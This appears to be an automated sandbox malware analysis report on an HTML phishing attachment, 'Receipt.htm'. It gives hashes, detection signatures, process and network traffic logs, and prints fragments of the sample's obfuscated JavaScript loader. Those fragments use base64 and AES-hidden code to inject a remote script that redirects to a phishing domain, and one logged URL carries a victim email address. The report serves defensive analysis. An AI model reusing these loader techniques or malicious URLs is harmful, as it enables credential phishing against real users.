Edit tour

Windows Analysis Report
Receipt.htm

Overview

General Information

Sample name:	Receipt.htm
Analysis ID:	1545491
MD5:	2d1c51a16dca3b4aecc67dcfe19184bd
SHA1:	22ea64712ae83cde0fa0922327d04b0db75c0ec6
SHA256:	49e415c160af7a6ff54d2c87395d10702b45a1d7dc7120d376c10ceb7f9179f5
Infos:

Detection

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

HTML file submission requesting Cloudflare captcha challenge

Detected javascript redirector / loader

HTML document with suspicious name

HTML document with suspicious title

Creates files inside the system directory

Detected non-DNS traffic on DNS port

HTML page contains hidden javascript code

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

Process Tree

System is w10x64

chrome.exe (PID: 5888 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Receipt.htm" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 864 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2552 --field-trial-handle=2196,i,17035854195700752652,17816157160969327340,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6900 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6092 --field-trial-handle=2196,i,17035854195700752652,17816157160969327340,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6256 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5608 --field-trial-handle=2196,i,17035854195700752652,17816157160969327340,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

Detected javascript redirector / loader

Source: Receipt.htm

HTTP Parser: Low number of body elements: 1

HTML document with suspicious title

Source: file:///C:/Users/user/Desktop/Receipt.htm

Tab title: Receipt.htm

Source: Receipt.htm

HTTP Parser: Base64 decoded: elmwood = ['w','ri','te'].join('');leafhopper = ['<s','cri','pt s','rc='].join('');barramundi /* fawn */ = ['https://','teacu',`rl.`,"com",'/r','es444.ph',"p?2-",`68747`,`470`,"73",'3a2f2','f527042','722e69',`74686265`,'74','6f78...

Source: https://teacurl.com/res444.php?2-68747470733a2f2f527042722e6974686265746f78692e636f6d2f7774716c6c48532f-peregrine

HTTP Parser: var pdaxochmxeimkxbz = document.createelement("script");pdaxochmxeimkxbz.setattribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(pdaxochmxeimkxbz);pdaxochmxeimkxbz.onload=function(){var {a,b,c,d} = json.parse(atob("eyjhijoiafpfawexq3psuncyufm4njndetvpahbnmwxwdfnum3lwwstcrhqrdwo2vllzmesxwxr6ber2ak9zannnmffkym9tzfwvmhhxrjhinxbzbmznzznhd1nnmvlobwl2vss1wu96befxu0s4nklwn0tpr0tkdudyng93vkrxywzwb1n2wvblzxjzenvqt2vjtnfloe5uem9jzdlxbgx3tu9gofwvuxuxdm5ut2nfajfzswfjtk5rddfik2lrcxy1alrleg9qelpscdhkvwvayk1tqkviovpxusttu2cwy1hsqwtsr0dcl21nbdhublnetm5cl0kyqnpumxp2bfk3rupkzwvycetfatv2q1lbmhvaefhyterwtwdxtdg4zmhwmnbwk3pxz0hizm9frlzfvudlmknjd3viv3btdmd3ngnstnfmnfnynnrarlrnzmphnvhusevomlbnetlzrlpfbvowvflfeupetg1kehvfnnbyexhweexwzxmzbfwvtuvtwgrhmvu3qjr4t2nwskrhtwmrtll2uljbyvbbngddtdlka3qrukxvwwhsmdfquzjtswdgsu5vu1jubedjk0i2cu9mafjzbe5xs2xlwvdgzej5qwrhnlhqwxfjqxb2avpbaflongfyqwdqnentcwn2tnjzntdimfq1yln3vjlfumrtchzzvw9fuzjicxq2ckgyr0z5sznclzjuadjsujlhm002qkfqtx...

Source: Receipt.htm	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Receipt.htm	HTTP Parser: No favicon
Source: https://rpbr.ithbetoxi.com/wtqllHS/#O#cG9ydGxhbmRzYWxlc0BzdGd1c2EuY29t	HTTP Parser: No favicon

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.253.45:443 -> 192.168.2.4:63806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:63825 version: TLS 1.2

Source: global traffic	TCP traffic: 192.168.2.4:63626 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.4:64183 -> 1.1.1.1:53

Source: Joe Sandbox View	IP Address: 104.18.94.41 104.18.94.41
Source: Joe Sandbox View	IP Address: 151.101.130.137 151.101.130.137
Source: Joe Sandbox View	IP Address: 151.101.130.137 151.101.130.137
Source: Joe Sandbox View	IP Address: 18.66.122.78 18.66.122.78

Source: Joe Sandbox View

JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50

Source: global traffic	HTTP traffic detected: GET /res444.php?2-68747470733a2f2f527042722e6974686265746f78692e636f6d2f7774716c6c48532f-peregrine HTTP/1.1Host: teacurl.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /res444.php?2-68747470733a2f2f527042722e6974686265746f78692e636f6d2f7774716c6c48532f-peregrine HTTP/1.1Host: teacurl.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /wtqllHS/ HTTP/1.1Host: rpbr.ithbetoxi.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rpbr.ithbetoxi.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rpbr.ithbetoxi.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rpbr.ithbetoxi.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/b/22755d9a86c9/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rpbr.ithbetoxi.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/bwuv1/0x4AAAAAAAxPQeoKC444sp2r/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://rpbr.ithbetoxi.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/b/22755d9a86c9/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8dac4dededb74654&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/bwuv1/0x4AAAAAAAxPQeoKC444sp2r/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/bwuv1/0x4AAAAAAAxPQeoKC444sp2r/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: rpbr.ithbetoxi.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rpbr.ithbetoxi.com/wtqllHS/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImJ3c2lMZFBpTGpKb3p0ZzNFN2E0WkE9PSIsInZhbHVlIjoiODZxK1d3cE9sY20vdk1kb3hLYklMY0RodURDYnNpWitleEJUa0tjeHVZeUJ6NjBtTldxcUpDMmtMcnhFRXVjRHNZcmthTzREc1FnWDJwbjVIMFBIelFnMFpZQ005cmpnZUNOaDZJSHBIMzVoRmhjZmttVURaZERYL3FDYWU3STIiLCJtYWMiOiIwMjJmYWRlY2NlMzY3NDBiOWE0YjI4NGI2NmIzYjI0YTA0NDdmODNkZjQ4NzhkZjQ1NGJjZjEyNzJjZjFiOWQxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjVYSHJMSWorRk02SDY1MDFJSDJ3Y0E9PSIsInZhbHVlIjoiZmFyZWlJc0lmcWNGc05ZMDM5NWxzRVpHRWw4U1ErVVRLQlRMQWNGTC9sSzduME96VVhhMFJwY1VENjdJdE8rajJHVEI1WU1WTHJvVThGUEgwYUxmcnZwYmpkOUtRRS9taFhzVk82aklqZWtEeDdWYXVQcGMwclYvQnB3c3FFZWEiLCJtYWMiOiJlYTM1YmJjYjNkNmFiYzBmMTg1MTMxYTc1NjA2YmY3OTQwNjlhZjZlN2IwOTMwNTUwZmJhNTczYTExZTM2NDIyIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8dac4dededb74654&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/87538823:1730297856:oBwGVF8aHz7-DDxOT_QFbYFX36Y1gtPfSuG-jhTbWFg/8dac4dededb74654/PfObaQesvT7A2EWQGdm61TroT3kSUKiEz7Y_CiOUW88-1730300735-1.1.1.1-qKhEgUlBXOY7wv6GqGx1zxf7gW6G6B7NA82Ime_vB5lAzADjhlb9PX07Rq671hhT HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8dac4dededb74654/1730300738284/Q3v5SykX3Gv5MvN HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/bwuv1/0x4AAAAAAAxPQeoKC444sp2r/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8dac4dededb74654/1730300738289/98eca653d447cdc000bdf0a65b958be54b9faf6a738fce912fe31597e0703ff3/_DbY3QOlI9S0muO HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/bwuv1/0x4AAAAAAAxPQeoKC444sp2r/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8dac4dededb74654/1730300738284/Q3v5SykX3Gv5MvN HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=MGG2mpSAltYVC4R&MD=3aPuGXPU HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/87538823:1730297856:oBwGVF8aHz7-DDxOT_QFbYFX36Y1gtPfSuG-jhTbWFg/8dac4dededb74654/PfObaQesvT7A2EWQGdm61TroT3kSUKiEz7Y_CiOUW88-1730300735-1.1.1.1-qKhEgUlBXOY7wv6GqGx1zxf7gW6G6B7NA82Ime_vB5lAzADjhlb9PX07Rq671hhT HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jnstrssjpuxhbzrroeqttnijOxtCCQUhFPCWFDQZVLPWDEPANBVGIELYPIKPCLODVOA HTTP/1.1Host: sjwa7r8libqlzy5hjynwjd0i2xjxrhu0x9hv1k83ow3mvnpyhtkv.ticurson.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://rpbr.ithbetoxi.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://rpbr.ithbetoxi.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/87538823:1730297856:oBwGVF8aHz7-DDxOT_QFbYFX36Y1gtPfSuG-jhTbWFg/8dac4dededb74654/PfObaQesvT7A2EWQGdm61TroT3kSUKiEz7Y_CiOUW88-1730300735-1.1.1.1-qKhEgUlBXOY7wv6GqGx1zxf7gW6G6B7NA82Ime_vB5lAzADjhlb9PX07Rq671hhT HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jnstrssjpuxhbzrroeqttnijOxtCCQUhFPCWFDQZVLPWDEPANBVGIELYPIKPCLODVOA HTTP/1.1Host: sjwa7r8libqlzy5hjynwjd0i2xjxrhu0x9hv1k83ow3mvnpyhtkv.ticurson.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
